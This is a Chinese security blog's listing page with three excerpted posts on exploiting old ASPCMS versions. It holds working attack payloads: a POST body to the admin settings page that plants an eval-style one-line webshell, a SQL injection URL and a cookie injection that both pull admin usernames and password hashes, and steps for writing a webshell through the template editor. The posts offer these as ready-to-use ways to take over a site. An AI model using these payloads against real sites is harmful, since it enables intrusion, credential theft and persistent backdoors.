ASPCMS 老版本秒杀拿SHELL

分类:安全 | 2013-02-12 | 撸过 1,706 次
1人扯谈

老的ASPCMS版本的秒杀拿SHELL漏洞

找到后台。。。然后

/admin/_system/AspCms_SiteSetting.asp?action=saves

直接POST

runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&S[......]

继续阅读

aspcms cookies欺骗和后台无验证注入

分类:安全 | 2012-02-11 | 撸过 1,904 次
1人扯谈

后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗!

————————后台注射————————

 

http://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3[......]

继续阅读

Aspcms 1.5 COOKIES 注入漏洞

分类:安全 | 2011-12-6 | 撸过 486 次
0人扯谈

Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值

在后面加上注入语句:

UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins

然后编辑帐号就能看到管理员的帐号和MD5密码值。

后台拿SHELL:

访问admin/_Style/AspCms_TemplateEdit.asp?filename=webshell.asp在里面加一句话或者大马。

保存后SHELL在风格目[......]

继续阅读